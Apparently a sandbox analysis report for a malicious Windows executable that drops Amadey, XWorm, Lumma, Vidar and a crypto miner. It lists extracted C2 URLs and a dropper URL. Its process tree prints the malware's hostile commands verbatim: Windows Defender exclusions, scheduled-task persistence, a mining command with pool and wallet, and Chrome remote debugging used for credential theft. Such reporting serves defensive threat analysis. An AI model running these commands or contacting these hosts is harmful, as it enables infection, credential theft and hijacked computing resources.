Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/03/2025, 03:12

General

  • Target

    6e22a9de137c193aa2a710b192bdc23798c5451e7d110654e37f2887ac8e0e0d.exe

  • Size

    2.0MB

  • MD5

    66f70f15eac0cff85f402a04f64865ce

  • SHA1

    1670c3c309b3c43c27224491e4ecaa895dbd3d12

  • SHA256

    6e22a9de137c193aa2a710b192bdc23798c5451e7d110654e37f2887ac8e0e0d

  • SHA512

    1b8e9ecb06608e884e9ea06ff99680875139b2ce509c8e78bd7ac5c15901550277c5cbd96fa3b3b9119367e98e9127ea9ab6f2ab5769b0cf4ba255c53799be5d

  • SSDEEP

    49152:gzPUPikOkVPOQI0saUpU7WTR6cukCljXg:wUPp/f4ukCljX

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

C2

however-canada.gl.at.ply.gg:62916

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Extracted

Family

lumma

C2

https://codxefusion.top/api

https://hardswarehub.today/api

https://pgadgethgfub.icu/api

https://hardrwarehaven.run/api

https://techmindzs.live/api

https://bz2ncodxefusion.top/api

https://quietswtreams.life/api

https://techspherxe.top/api

https://earthsymphzony.today/api

Extracted

Family

vidar

Version

13.2

Botnet

f083f1f6fa006fbbc744aa9888fb3e8a

C2

https://t.me/g_etcontent

https://steamcommunity.com/profiles/76561199832267488

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0

Extracted

Family

lumma

C2

https://codxefusion.top/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 20 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 56 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • UPX packed file 59 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 52 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6e22a9de137c193aa2a710b192bdc23798c5451e7d110654e37f2887ac8e0e0d.exe
    "C:\Users\Admin\AppData\Local\Temp\6e22a9de137c193aa2a710b192bdc23798c5451e7d110654e37f2887ac8e0e0d.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Users\Admin\AppData\Local\Temp\10262510101\dW2A04h.exe
        "C:\Users\Admin\AppData\Local\Temp\10262510101\dW2A04h.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4592
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5328
      • C:\Users\Admin\AppData\Local\Temp\10263670101\DtSVjfo.exe
        "C:\Users\Admin\AppData\Local\Temp\10263670101\DtSVjfo.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4148
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1084
      • C:\Users\Admin\AppData\Local\Temp\10263690101\BbU7NdP.exe
        "C:\Users\Admin\AppData\Local\Temp\10263690101\BbU7NdP.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5312
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:3024
        • C:\Users\Admin\AppData\Local\Temp\10264950101\Sbyncpk.exe
          "C:\Users\Admin\AppData\Local\Temp\10264950101\Sbyncpk.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:5508
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5468
        • C:\Users\Admin\AppData\Local\Temp\10266570101\IUXds3n.exe
          "C:\Users\Admin\AppData\Local\Temp\10266570101\IUXds3n.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAaABpACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAYQBiACMAPgA="
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:548
          • C:\Users\Admin\AppData\Roaming\WidgetServiice.exe
            "C:\Users\Admin\AppData\Roaming\WidgetServiice.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2328
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WidgetServiice.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3704
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WidgetServiice.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1600
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4504
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5096
          • C:\Users\Admin\AppData\Roaming\fbuild.exe
            "C:\Users\Admin\AppData\Roaming\fbuild.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:5432
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAbAB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAagByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdwBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZwBuACMAPgA="
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4380
            • C:\Users\Admin\AppData\Local\Temp\build.exe
              "C:\Users\Admin\AppData\Local\Temp\build.exe"
              5⤵
              • Executes dropped EXE
              PID:5188
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\build.exe"
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6084
                • C:\Windows\System32\cmd.exe
                  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                  7⤵
                    PID:3500
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3948
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2244
                  • C:\Windows\System32\cmd.exe
                    "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                    7⤵
                      PID:1604
                      • C:\Windows\system32\schtasks.exe
                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                        8⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5572
                    • C:\Windows\System32\cmd.exe
                      "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                      7⤵
                        PID:368
                        • C:\Users\Admin\AppData\Local\Temp\services64.exe
                          C:\Users\Admin\AppData\Local\Temp\services64.exe
                          8⤵
                          • Executes dropped EXE
                          PID:4392
                          • C:\Windows\System32\conhost.exe
                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
                            9⤵
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5672
                            • C:\Windows\System32\cmd.exe
                              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                              10⤵
                                PID:8096
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                  11⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:10164
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                  11⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:11968
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:10840
                                • C:\Windows\System32\conhost.exe
                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                  11⤵
                                    PID:12144
                                • C:\Windows\System32\cmd.exe
                                  C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=41uyesNdYjvNtMefq4i8AE8BSCySYSPuuWhyr2EfZJJ4eruTWNmyAFpaKWdyKEeL17bacUi7ALsm2WoDxPDXj7QiGFpzkrR --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O3QJHF4wHz20zKQH0DbQM9oeUFpyp1OviyxNzDJudHQ" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=50 --tls --cinit-stealth
                                  10⤵
                                  • Blocklisted process makes network request
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:11248
                      • C:\Users\Admin\AppData\Local\Temp\ebuild.exe
                        "C:\Users\Admin\AppData\Local\Temp\ebuild.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:1924
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\ebuild.exe"
                          6⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3844
                          • C:\Windows\System32\cmd.exe
                            "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                            7⤵
                              PID:516
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4924
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                8⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2364
                            • C:\Windows\System32\cmd.exe
                              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                              7⤵
                                PID:396
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                                  8⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:5004
                              • C:\Windows\System32\cmd.exe
                                "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                                7⤵
                                  PID:5724
                                  • C:\Users\Admin\AppData\Local\Temp\services32.exe
                                    C:\Users\Admin\AppData\Local\Temp\services32.exe
                                    8⤵
                                    • Executes dropped EXE
                                    PID:4372
                                    • C:\Windows\System32\conhost.exe
                                      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services32.exe"
                                      9⤵
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5996
                                      • C:\Windows\System32\cmd.exe
                                        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                        10⤵
                                          PID:8148
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:8360
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                            11⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:11596
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
                                          "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
                                          10⤵
                                          • Executes dropped EXE
                                          PID:10888
                                          • C:\Windows\System32\conhost.exe
                                            "C:\Windows\System32\conhost.exe" "/sihost32"
                                            11⤵
                                              PID:12056
                            • C:\Users\Admin\AppData\Local\Temp\10267740101\aZYFObO.exe
                              "C:\Users\Admin\AppData\Local\Temp\10267740101\aZYFObO.exe"
                              3⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:5272
                            • C:\Users\Admin\AppData\Local\Temp\10268280101\amnew.exe
                              "C:\Users\Admin\AppData\Local\Temp\10268280101\amnew.exe"
                              3⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2856
                              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                4⤵
                                • Downloads MZ/PE file
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Adds Run key to start application
                                • System Location Discovery: System Language Discovery
                                PID:768
                                • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:5132
                                  • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:5924
                                • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1076
                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5224
                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4636
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1076 -s 808
                                    6⤵
                                    • Program crash
                                    PID:2972
                                • C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5164
                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                    SCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3888
                                • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4160
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    6⤵
                                    • Downloads MZ/PE file
                                    • System Location Discovery: System Language Discovery
                                    • Checks processor information in registry
                                    PID:5100
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                      7⤵
                                      • Uses browser remote debugging
                                      • Enumerates system info in registry
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      PID:5196
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffebda4dcf8,0x7ffebda4dd04,0x7ffebda4dd10
                                        8⤵
                                          PID:5188
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:2
                                          8⤵
                                            PID:6620
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1600,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2236 /prefetch:3
                                            8⤵
                                              PID:6684
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=1604,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2388 /prefetch:8
                                              8⤵
                                                PID:5132
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3268 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:1180
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3564,i,13301411901747072211,5529703699865325905,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3576 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:5392
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
